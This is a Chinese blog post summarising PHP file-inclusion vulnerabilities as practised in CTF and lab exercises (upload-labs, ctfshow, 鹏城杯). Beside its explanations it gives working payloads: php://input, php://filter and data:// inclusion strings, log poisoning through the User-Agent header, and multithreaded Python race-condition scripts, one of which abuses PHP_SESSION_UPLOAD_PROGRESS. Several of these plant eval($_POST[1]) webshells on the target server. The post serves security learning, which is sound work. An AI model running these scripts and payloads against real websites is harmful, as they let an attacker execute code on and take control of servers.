文件包含总结

已于 2022-11-30 21:30:55 修改
阅读量1.3k 收藏 7
点赞数
分类专栏: 比赛 文章标签: php 安全 web安全
于 2022-11-30 21:22:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/akxnxbshai/article/details/128122654
版权

概念

是指将已有的代码以文件形式包含到某个指定的代码中,从而使用其中的代码或者数据,一般是为了方便直接调用所需文件,文件包含的存在使得开发变得更加灵活和方便。

文件包含常见函数

include()  // 执行到include时才包含文件,找不到文件产生警告,脚本继续执行
require()  // 程序运行就包含文件,找不到文件产生错误,脚本停止
include_once()
require_once()
// 和前面注解一样,_once()后缀表明只会包含一次,已包含则不会再包含

漏洞成因

文件包含漏洞原因主要有两点:

1.函数中的参数可控。

2.文件包含时,无论文件是何类型,他都会将该文件当作php文件来解析,无法解析时会回显其文件的内容

本地尝试1(include)

代码

1.php

<?php
    highlight_file(__file__);
    $filename = $_GET['file'];
    include $filename;
?>

然后写一个被包含的文件。

然后get传入shell.php,发现成功被解析。

然后修改一下shell.php为shell.png,并改变其内容

<?php system('dir');

成功解析,说明include可以绕过后缀名直接解析文件中的php代码。

然后来尝试一下伪协议:

首先是php伪协议:

php://input:

payload:

GET: file=php://input
POST: <?php file_put_contents('./feng.php','<?php eval($_POST[1]);?>')?>

写入木马文件feng.php

file://

需要直接路径

php://filter

payload:

file=php://filter/resource=文件名

base64输出文件内容;

payload:

?file=php://filter/read=convert.base64-encode/resource=flag.php

data协议

payload:

?file=data://text/plain,<?php%20system(%27dir%27);

base64传入命令:

payload:

?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz

本地尝试2(require)

代码:

<?php
require('shell.png');
echo $flag;
?>

成功得到了shell.png中的$flag的值,所以require的一个作用就是在一个文件里去包含另一个文件,然后可以用另一个文件里的参数和方法。

还有几种常见的类型,日志文件包含、条件竞争、脏文件绕过、phar://伪协议+反序列化等等。

条件竞争类型

条件竞争漏洞是一种服务器端的漏洞,由于服务器端在处理不同用户的请求时是并发进行的。开发者在进行代码开发时常常倾向于认为代码会以线性的方式执行,而且他们忽视了并行服务器会并发执行多个线程,这就会导致意想不到的结果,简而言之就是并没有考虑线程同步。因此,如果并发处理不当或相关操作逻辑顺序设计的不合理时,将会导致此类问题的发生。

用upload-labs来演示。

Pass-18:

源码:

?php
include '../config.php';
include '../head.php';
include '../menu.php';

$is_upload = false;
$msg = null;

if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_name = $_FILES['upload_file']['name'];
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_ext = substr($file_name,strrpos($file_name,".")+1);
    $upload_file = UPLOAD_PATH . '/' . $file_name;

    if(move_uploaded_file($temp_file, $upload_file)){
        if(in_array($file_ext,$ext_arr)){
             $img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
             rename($upload_file, $img_path);
             $is_upload = true;
        }else{
            $msg = "只允许上传.jpg|.png|.gif类型文件!";
            unlink($upload_file);
        }
    }else{
        $msg = '上传出错!';
    }
}
?>

思路:文件是先传到服务器上,然后再去判断是否符合要求,当我们一直上传并访问该文件时,会出现文件还没来得及删除就被我们访问到,然后我们写一个写入木马文件的木马,最后会在服务器上留下一个访问时被上传上去的木马,这个木马并不会被删除,就达到了getshell的目的。

脚本:

import requests
import threading


def write():
    url = 'http://www.upload.com:83/upload/Pass-18/index.php?action=show_code'
    files = {'upload_file': (
        'shell2.php', "<?php fputs(fopen('feng.php','w'),'<?php phpinfo();?>');?>")}
    data = {'submit': '上传'}
    while True:
        r = requests.post(url=url, data=data, files=files)

def read():
    while True:
        re = requests.get('http://www.upload.com:83/upload/upload/shell2.php')
        if re.status_code == 200:
            print('上传成功')

if __name__ == '__main__':
    evnet = threading.Event()
    with requests.session() as session:
        for i in range(20):
            threading.Thread(target=write).start()
        for i in range(20):
            threading.Thread(target=read).start()
    evnet.set()

运行脚本,发现上传成功:

Pass-19:

源码:

<?php
include '../config.php';
include '../head.php';
include '../menu.php';

$is_upload = false;
$msg = null;
if (isset($_POST['submit']))
{
    require_once("./myupload.php");
    $imgFileName =time();
    $u = new MyUpload($_FILES['upload_file']['name'], $_FILES['upload_file']['tmp_name'], $_FILES['upload_file']['size'],$imgFileName);
    $status_code = $u->upload(UPLOAD_PATH);
    switch ($status_code) {
        case 1:
            $is_upload = true;
            $img_path = $u->cls_upload_dir . $u->cls_file_rename_to;
            break;
        case 2:
            $msg = '文件已经被上传,但没有重命名。';
            break; 
        case -1:
            $msg = '这个文件不能上传到服务器的临时文件存储目录。';
            break; 
        case -2:
            $msg = '上传失败,上传目录不可写。';
            break; 
        case -3:
            $msg = '上传失败,无法上传该类型文件。';
            break; 
        case -4:
            $msg = '上传失败,上传的文件过大。';
            break; 
        case -5:
            $msg = '上传失败,服务器已经存在相同名称文件。';
            break; 
        case -6:
            $msg = '文件无法上传,文件不能复制到目标目录。';
            break;      
        default:
            $msg = '未知错误!';
            break;
    }
}
?>

还是条件竞争,不过需要修改一下路径和上传文件的名称。

脚本如下:

import requests
import threading


def write():
    url = 'http://www.sql.coom:83/upload/Pass-19/index.php?action=show_code'
    files = {'upload_file': (
        'shell2.png', "<?php fputs(fopen('./feng3.php','w'),'<?php @eval($_POST[1])?>');?>")}
    data = {'submit': '上传'}
    while True:
        r = requests.post(url=url, data=data, files=files)

def read():
    while True:
        re = requests.get('http://www.sql.coom:83/upload/include.php?file=upload/shell2.png')
        if re.status_code == 200:
            print('上传成功')

if __name__ == '__main__':
    evnet = threading.Event()
    with requests.session() as session:
        for i in range(20):
            threading.Thread(target=write).start()
        for i in range(20):
            threading.Thread(target=read).start()
    evnet.set()

条件竞争思路几乎都差不多,还有的是session条件竞争,需要开启session.start,不多说了。

日志文件包含+简单绕过

以ctfshow例题为例:

源码:

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

源码很简单,过滤了php和data协议,然后还过滤了:

利用日志文件包含,首先看一下服务器类型。

发现时Nginx1.18.0版本,在网上找到了日志问价路径,然后改一下UA头,bp打一下。

需要访问两次,第一次写入修改的UA头,第二次才能成功包含。

有时会有放火墙过滤,这时可以用脏数据绕过。

以[鹏城杯 2022]简单包含为例:

源码很简单,但当我们正常包含时,会发现。

想办法绕过waf,试了很多种方法,最后脏数据成功绕过。

传入一大串垃圾数据,让其waf崩溃,从而可以达到文件包含目的。

例题

ctfshow web入门-85

先看题目给出的代码:

<?php
define('还要秀?', dirname(__FILE__));
set_include_path(还要秀?);
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    include($file);

    
}else{
    highlight_file(__FILE__);
}

发现是include问题,并且过滤了:和.,利用session条件竞争来解题。

import requests
import io
import threading

url = "http://532ebcbc-0b51-4afc-a511-711d3c73a1e6.challenge.ctf.show/"
data = {"1" : "file_put_contents('/var/www/html/feng.php','<?php @eval($_POST[1]);?>');"}
sessionid = "feng"

def write(session):
    fileBytes = io.BytesIO(b'a' * 1024 * 20)
    while True:
        response = session.post(url,
                          data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_POST[1]);?>'},
                          cookies={'PHPSESSID': sessionid},
                          files={"file":('feng.jpg',fileBytes)}
                          )

def read(session):
    while True:
        response = session.post(url + '?file=/tmp/sess_' + sessionid, data=data)
        response2 = session.get(url + 'feng.php');
        if response2.status_code == 200:
            print('Success upload')
        else:
            print(response2.status_code)


if __name__ == '__main__':

    # 开启多线程进行竞争
    evnet = threading.Event()
    with requests.session() as session:
        for i in range(20):
            threading.Thread(target=write, args=(session,)).start()
        for i in range(20):
            threading.Thread(target=read, args=(session,)).start()
    evnet.set()

参考:【文件包含&条件竞争】详解如何利用session.upload_progress文件包含进行… - FreeBuf网络安全行业门户

f0njl
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
文件包含知识点总结.pdf
02-10
根据网上视频课程学习总计知识点,文档结构分为文件包含的定义、php文件包含函数、漏洞原理及特点、常见的利用方式做出总结 整理为文档 可以方便查阅
jpg图片文件结构总结
12-05
JPEG文件的结构主要由"段"组成,每个段包含特定的信息,如文件头、文件尾、图像数据等。段的一般结构包括段标识(以FF开头)、段类型、段长度和段内容。某些段可能没有长度描述和内容,比如文件头和文件尾。 段类型...
Linux学习笔记 —— shell :: 函数文件包含
xiaodouhao123456的博客
11-04 159
1. 函数定义 [ function ] funname [()] { action; [return int;] } 说明: 1、可以带function fun() 定义,也可以直接fun() 定义,不带任何参数。 2、参数返回,可以显示加:return 返回,如果不加,将以最后一条命令运行结果,作为返回值。 return后跟数值n(0-255 #!/bin/bash # author:菜鸟教程 # url:www.runoob.com funWithReturn(){
文件包含函数
qq_70851535的博客
05-21 1213
将代码传入文件,从而直接执行文件的代码通常文件包含漏洞产生于文件包含函数LFI:Local File Inclusion,本地文件包含漏洞,大部分情况下遇到的文件包含漏洞都是LFIRFI:Remote File Inclusion,远程文件包含漏洞(默认为On) ,规定是否允许从远程服务器或者网站检索数据(php5.2之后默认为Off) ,规定是否允许远程文件。
网络安全——文件包含漏洞
weixin_54055099的博客
09-24 1685
文件包含漏洞的原理
由bugku baby lfi 2一题引入LFI漏洞(本地文件包含
2301_76690905的博客
10-25 771
"./" 的作用是将文件路径 "./languages/../../../../../../etc/passwd" 解释为相对于当前工作目录的路径。我们的目标是要包含到/etc/passwd,那显而易见需要我们跳到根目录再进行包含,这里试了../../../../../etc/passwd提示不合法,那我们先访问当前目录下的languages再尝试跳回根目录,再去访问我们的目标。根据选择语言的提示,我们的参数名可能是language,尝试了file,language作为参数名后确定传参给language。
一文详解文件包含漏洞
MachineGunJoe666
06-10 1804
file:// #访问本地文件系统http:// #访问HTTPs网址ftp:// #访问ftp URLphp:// #访问输入输出流zlib:// #压缩流data:// #数据expect:// #处理交互式的流glob:// #查找匹配的文件路径。
ctfshow-web79(文件包含)
m0_62094846的博客
01-11 555
if(isset($_GET['file'])){ $file = $_GET['file']; $file = str_replace("php", "???", $file); include($file); }else{ highlight_file(__FILE__); } 过滤了php,如果用上题的php://file怎么都解不开,可以使用data ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQg.
php文件包含的几种方式总结
01-20
require:require函数一般放在PHP脚本的最前面,PHP执行前就会先读入require指定引入的文件,包含并尝试执行引入的脚本文件。require的工作方式是提高PHP的执行效率,当它在同一个网页解释过一次后,第二次便不会...
web网站文件包含漏洞和攻击-运维安全详细笔记总结
06-30
web 网站文件包含漏洞和攻击-运维安全详细笔记总结 文件包含漏洞是指攻击者通过上传恶意文件,利用服务器的文件包含功能来执行恶意代码,从而获取服务器的控制权。文件包含漏洞可以分为本地文件包含漏洞和远程文件...
php文件包含函数有哪些,文件包含
weixin_34279705的博客
03-20 2148
文件包含文件包含函数:include、include_once、require、require_onceinclude/require区别:对文件包含的操作几乎一样除了在报错方面有差别,include函数假如找不到所包含的文件它会跳过执行下一条代码,发出警告(warning)但是对于require函数,他会出现报错(Error)然后结束。文件包含防御使用open_basedir限制访问在指定区...
CTFshow刷题日记-WEB-文件包含
Love&Share
09-04 4124
文件包含专题 web78 if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 依旧是代码审计类型 直接伪协议 ?file=php://filter/convert.base64-encode/resource=flag.php ?file=data://text/plain,<?php system("nl flag.php");
stdio.h头文件包含函数有哪些?
热门推荐
weiyuanzhuo的博客
08-23 2万+
stdio.h 以下来自维基百科文 多数与C语言输入输出相函数定义(C++的)。 文件访问 fopenfreopenfflushfclose 二进制输入/输出 freadfwrite 非格式化输入/输出 fgetc/getcfputc/putcungetcfgetsfputs 格式化输入/输出 scanf/fscanf/sscanfprintf/
PHP文件包含函数
07-27 1014
在实际开发,常常需要把程序的公用代码放到一个文件,使用这些代码的文件只需要包含这个文件即可。这种方法有助于提高代码的重用性,给代码的编写与维护带来很大的便利。在PHP, 有require、require_once、include、include- once四种方法包含一个文件。 函数包含失败特点 Inlcude 返回一条警告 文件继续向下执行。通常用于...
浅谈“文件包含
→_→
07-20 1786
一:漏洞名称: 文件include漏洞、文件包含 描述: 文件包含是指程序代码在处理包含文件的时候没有严格控制。导致用户可以构造参数包含远程代码在服务器上执行,并得到网站配置或者敏感文件,进而获取到服务器权限,造成网站被恶意删除,用户和交易数据被篡改等一系列恶性后果。主要包括本地文件包含和远程文件包含两种形式,由于开发人员编写源码,开放着将可重复使用的代码插入到单个的文件,并在需要的时候将它们包含在特殊的功能代码文件,然后包含文件的代码会被解释执行。由于并没有针对代码存在文件包含的函
文件包含的小总结
sinat_38378265的博客
05-10 630
这是本人对于文件包含的一些小归纳,小总结,对于一些新人小白有一定的引导作用,对于老人来说是可能微不足道,做的不好忘大家多多包含,祝你前程似锦。
ctfshow文件包含-超详解
qq_50589021的博客
08-05 1876
文件包含 web78-79 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } ?> 伪协议: ?file=php://filter/read=convert.base64-encode/resource=flag.php ?file=data://text/plain;base64,PD9waHAgc3lzd
浅谈PHP_SESSION_UPLOAD_PROGRESS和条件竞争的巧妙利用
qq_52737372的博客
07-20 921
前些阵子CISCN
html包含html文件
最新发布
12-28
在HTML,无法直接使用include命令来包含其他HTML文件。HTML是一种静态标记语言,它不支持像ASP或PHP这样的服务器端脚本语言的功能。因此,无法在HTML使用include命令来包含其他HTML文件。 然而,有一些方法可以实现在HTML包含其他HTML文件的效果。其一种方法是使用JavaScript的AJAX技术。通过使用AJAX,可以通过异步加载其他HTML文件的内容,并将其插入到当前HTML页面的指定位置。这样可以实现在HTML包含其他HTML文件的效果。 另一种方法是使用服务器端脚本语言(如ASP、PHP、JSP等)来生成HTML页面。在这种情况下,可以使用服务器端脚本语言的include命令来包含其他HTML文件。当浏览器请求这个包含了其他HTML文件的页面时,服务器会先解析服务器端脚本语言,然后将生成的HTML页面发送给浏览器。 总结起来,虽然HTML本身不支持直接包含其他HTML文件,但可以通过使用JavaScript的AJAX技术或服务器端脚本语言来实现在HTML包含其他HTML文件的效果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

f0njl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值